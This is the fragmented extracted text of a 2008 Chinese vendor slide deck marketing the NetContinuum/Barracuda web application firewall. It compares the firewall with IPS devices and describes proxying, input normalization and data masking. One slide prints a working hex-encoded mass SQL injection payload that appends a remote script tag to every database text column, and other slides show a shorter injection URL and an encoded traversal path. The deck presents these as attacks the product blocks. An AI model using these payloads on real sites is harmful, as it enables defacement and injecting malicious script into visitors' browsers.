资源描述
*,保护企业网站安全,WEB,应用安全防护技术,Web,网站应用的特点,客户,员工,合作伙伴间互动更多,工作系统的英特网化,关键业务流程和数据在英特网上的暴露,协议和架构的标准化也带来更多的安全问题,web,应用安全问题不断增长,应用安全,数据安全不断增长,传统安全问题,如病毒、垃圾邮件,等不断递减,您是否有如下担心?,网站被攻击,网站被篡改,被,OWASP,列举的前十位的攻击攻破,数据被窃取,怎么才能阻止下列攻击,:,跨站脚本攻击,(XSS),SQL,注入,Cookie,篡改,缓存溢出,网站需要达到,PCI,标准,现有安全措施无能为力,2008,博威特网络技术(上海)有限公司。版权所有,不得转载。,防火墙,数据中心,局域网,防火墙只能阻断网络层的攻击,入侵监测系统,80,端口,web,流量仍然能够通过,最终用户,Web,应用,SQL SlammerCode Red,Nimda,Forceful browsing,Cross site scriptingOS command injection,Unicode attacksCookie password theft,Cookie poisoningWeb-based worms,SQL injectionSite defacing,攻击,对已知漏洞的防护延迟,2008,博威特网络技术(上海)有限公司。版权所有,不得转载。,Database Servers,Customer Info,Business Data,Transaction Info,Network,Operating,Systems,Database,Servers,Operating,Systems,Application,Servers,Operating,Systems,Web,Servers,Network Firewall,IDS,IPS,机密数据,一成不变的低效的“消防演习”模式,补丁总是不够及时而且容易出错,基于指纹的防护措施,对于“零日攻击”毫无办法,Web,应用防护和,IPS,的区别,IPS,设备是基于指纹识别的安全系统,通过将数据包和数据库中攻击指纹的比较来判断是否为恶意攻击,通常从被动的,IDS,技术进化而来。,基于特征的,针对典型攻击技术的报警和阻断,使用“允许除非明确否认”模式,目的是保护广泛的一段网络协议和环境,而不是侧重保护,web,应用,IPS,对,Web,攻击防护的不足,IPS,只能捕获已知攻击,黑客少许修改,现有的特征库将不起作用。,SSL,加密使,IPS,设备对所有的,web,攻击失效。,IPS,不能对,URL,和,Unicode,编码流量规范化。碎片攻击等将使,IPS,失去作用。,IPS,只知道包和请求,而不知道网络和应用。无法根据实际应用做客户化防护。,Tom&Jerry,Web,应用防护和,IPS,的区别,可怜的老板,聪明的小偷,伪装一下,轻松搞定,奇怪,?,老鼠不应该带帽子的,不符合,Jerry,老鼠的特征,允许通行,Jerry,A,B,C,两个耳朵,一条尾巴,身高,15cm,特征库,嘿嘿,又来了,真实只笨猫,老鼠就是老鼠,穿什么衣服,禁止入内,最新老鼠识别器,,我看行,老鼠,老虎,大象,猫,老鼠骨骼特征,老鼠,DNA,分析,资料库,Barracuda Networks Confidential,13,WEB,应用安全防护技术,全面的,WEB,站点防护,降低商业风险,各种攻击,非法访问,WEB,站点伪装,WEB,站点篡改,Outbound,数据窃取防护,应用传输加速,缓存、压缩、,TCP,连接复用、,SSL,卸载和加速、负载均衡,审计及合规,-,帮助企业通过安全审计,-,达到,PCI(,支付卡,),应用安全规范要求,-,美国萨班法案,(Sarbanes Oxley),及其他合规性要求,厂商,/,咨询顾问的解决方案,作为,RFI/RFP,模版,需求,6.5:,开发安全的应用程序,需求,6.6:,审核应用安全安全性,选择,1:,专业公司进行代码审核,选择,2:,部署应用防火墙,哪里需要我们,Business Critical Applications,NetContinuum,Web Security Gateway,Application D,Application E,Supply Chain,App Servers,FTP Servers,Inventory Servers,2008,博威特网络技术(上海)有限公司。版权所有,不得转载。,用户,Web,应用,TCP,进程代理,(TCP Session Full Proxy),Net,防火墙,NAT,ACL,PAT,进程维护,(Normalize Session),协议遵从,(Protocol Compliance),SSL,加密解密,HTTP,信头重写,URL,翻译,网站隐藏,防爬行,Web,地址转换,AAA,应用防,DoS,SQL/,命令注入,DAP(Global and Session),URL,ACLs,Forms,及,Cookie,窃取,REGEX,保护,TCP Pooling,缓存,GZIP,压缩,SSL,卸载,重新加密,应用及服务器健康检查,内容交换,(Content Switching),负载均衡,记录、监控、报告,终止,安全,加速,反向代理,保护应用基础架构,隐藏,Cookie,安全,Web,地址转换,根据应用强化安全,动态应用建模,弹性安全策略,颗粒度极小,可高度自定义的,Web,访问控制列表,三步实现应用安全,2008,博威特网络技术(上海)有限公司。版权所有,不得转载。,1,终止所有流量,我们就可以管理它。,tcp,ssl,严格意义上来说,这是“反向代理”。,2008,博威特网络技术(上海)有限公司。版权所有,不得转载。,部署,2,在边界对用户进行验证,LDAP,RADIUS,Client Certificates,Source IP,HTTP Auth,CA,SiteMinder,2008,博威特网络技术(上海)有限公司。版权所有,不得转载。,安全,3,标准化数据,d5opx;GE=,ZV5;u,7JM4 m,?,Decrypt SSL,%2e%2e%2fpartners%2Fe,%2ffinance%2frec%2f,Normalize,./partners/,/finance/,rec,/,2008,博威特网络技术(上海)有限公司。版权所有,不得转载。,安全,4,检查流量是否为恶意攻击,2008,博威特网络技术(上海)有限公司。版权所有,不得转载。,安全,企业网站结构,Operating Systems,Operating Systems,Operating Systems,Network Firewall,http,:/,www.none.to,/script,?submenu=,update&uid,=,1+or+like%25admin%25;-%00,Microsoft,SQL Server,Web Servers,Presentation Layer,Database Servers,Customer Info,Business Data,Transaction Info,App Servers,Business Logic,J2EE/.NET,Legacy Apps,Microsoft,IIS,Apache,Linux,Solaris,AIX,Windows,2008,博威特网络技术(上海)有限公司。版权所有,不得转载。,web,应用防火墙如何工作?,2008,博威特网络技术(上海)有限公司。版权所有,不得转载。,用户,Web,应用服务,检查,:,恶意命令,非法关键字,隐藏字段窃取,参数窃取,HTTP,修改办法,最大长度例外,非法,URLs,WSI,身份验证,XML Schema,验证,执行,:,目的应用逻辑,网站隐身,合法爬行,合法参数值,敏感信息保护,合理的进程状态,进程安全,合法,URLs,对,应用数据录入完整检查,完全掌握应有数据值类型,实,时策略生成及执行,请求限制,请求限制主要是对请求中的报头信息进行参数长度的限制,阻断超出限制范围的请求,保证免遭缓冲溢出等恶意攻击。,SQL,注入的一个实例,;DECLARE%20S%20CHAR(4000);SET%20S=CAST(0 x4445434C4152452040542076617263686,17228323535292C404320766172636861722832353529204445434C415245205461626C655F4,37572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652,066726F6D207379736F626A6563747320612C737973636F6C756D6E732062207768657265206,12E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653,D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E7,8747970653D31363729204F50454E205461626C655F437572736F72204645544348204E45585,42046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C45284,04046455443485F5354415455533D302920424547494E20657865632827757064617465205B2,72B40542B275D20736574205B272B40432B275D3D727472696D28636F6E76657274287661726,36861722C5B272B40432B275D29292B2727223E3C2F7469746C653E3C7363726970742073726,33D22687474703A2F2F6A732E75736572732E35312E6C612F313938313136322E6A73223E3C2,F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272,725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A732E7573657,2732E35312E6C612F313938313136322E6A73223E3C2F7363726970743E3C212D2D272727294,645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4,04320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F4341544520546,1626C655F437572736F72%20AS%20CHAR(4000);EXEC(S),输入验证引擎侦测并阻断攻击,SQL,注入,跨站点脚本攻击,命令攻击,非法字符集,排除关键字,偷窃命令,参数访问控制列表,强化对表单字段和其他应用参数的安全策略,报头访问控制列表,强化对标准和自定义,HTTP,报头的安全策略,阻断隐藏在报头值中的攻击,2008,博威特网络技术(上海)有限公司。版权所有,不得转载。,输入验证,Web Applications,Users,Cookie,加密保证会话的完整性,维护客户端会话完整性,保证用户信息的安全,Cookie,加密提供私密性,数字证书提供可靠性,对用户和应用完全透明,2008,博威特网络技术(上海)有限公司。版权所有,不得转载。,会话完整,站点信息隐藏,PROBLEM,Easy to discover a gold mine of clues about app environment,Web Applications,黑客,Whisker scanning,,Servers:Microsoft IIS 4.0,Windows 2000 SP2,FrontPage/5.0.2.2623,Vulnerable URL:cgi-bin/code.php3,Vulnerable URL:cgi-bin/admin.php3,应用防火墙,对外部访问隐身,Web,服务器类型,应用服务器类型,操作系统,版本号,版本更新程度,已知安全漏洞,IP,地址,工作站信息,Whisker scanning,,Servers:,COULD NOT DETERMINE,Server returned no data,Vulnerable URL,:,None found,防爬行功能,应用防火墙,抵御黑客爬行程序于门外,让正常爬行程序进入,面向外部应用程序,应用防火墙,用户,Web,应用,/,服务,BLOCK,MASK,XXXX-XXXX-XXXX-3456,MASK,XXX-XX-1234,BLOCK,MASK,ID#123-XXXX,Employee ID,ID#123-4567,Social Security,550-55-1234,Credit Card,4321-4567-7654-3456,Drivers License,A123456,Patient ID,134-AR-627,5,虚拟化部署,Users,NetContinuum,Application Security Gateway,What Users See,/finance,/partners,/login,Addresses,2008,博威特网络技术(上海)有限公司。版权所有,不得转载。,控制,虚拟化部署,2008,博威特网络技术(上海)有限公司。版权所有,不得转载。,外部,Web,应用及服务,内部应用,应用防火墙,策略,A,网站隐身,Web,地址转换,立即,SSL,Cookie,保护,深度检查,安全交易记录,策略,B,网站隐身,立即,SSL,登陆控制,公司网站,策略,C,网站隐身,通过一个单独网关部署多个独立管理的应用,各应用采用不同的安全策略在不修改网络架构的情况下增加新的应用,为多元化的机构提供显著的运营优势,实时配置修改后台系统,而无需让系统下线,6,终止了流量,我们优化它。,负载均衡,缓存,HTTP,压缩,SSL,加速,TCP,连接池,2008,博威特网络技术(上海)有限公司。版权所有,不得转载。,部署,加快应用的响应时间,NetContinuum,CPU,Util,%,缓存,压缩,TCP,连接复用,SSL,卸载和加速,负载均衡,Application,Response Time,Bandwidth,Consumption,30 400%,响应速度的提升以及完善应用安全,Server,Performance,WEB,应用防护优势,减少不安全造成的损失,减少客户数据、商业机密、员工信息、财务信息及其他敏感数据泄露的可能性。,减少因泄露信息而产生法律诉讼的可能性。,减少因安全问题造成公司股价下跌、形象受损、客户信誉降低的可能性。,更早的遵从有关法规对企业网络安全的规定如:,(SOX,GLB,HIPAA,CA SB-386),WEB,应用防护优势,加快应用的使用,网站可以提前发布,更早产生经济效益。,便于维护,发现漏洞后,无须离线等待升级补丁。,对于老的应用程序,即使维护团队不再,仍可以得到防护。,优化运行,补丁管理,日志合并和管理,隐蔽内部结构,易于发布应用,提高安全策略管理效率,SSL,管理,初始化,SSL,更简洁,无须在应用程序中设定。,证书授权,&,证书合并,,无须在每台服务器上购买或设置证书,“,NetContinuum,is poised to be the first traditional WAF vendor to stake a claim in the new Application Assurance Platform market.”,Andy,Jaquith,December 2005,declaring,NetContinuum,a“Market Leader”,
展开阅读全文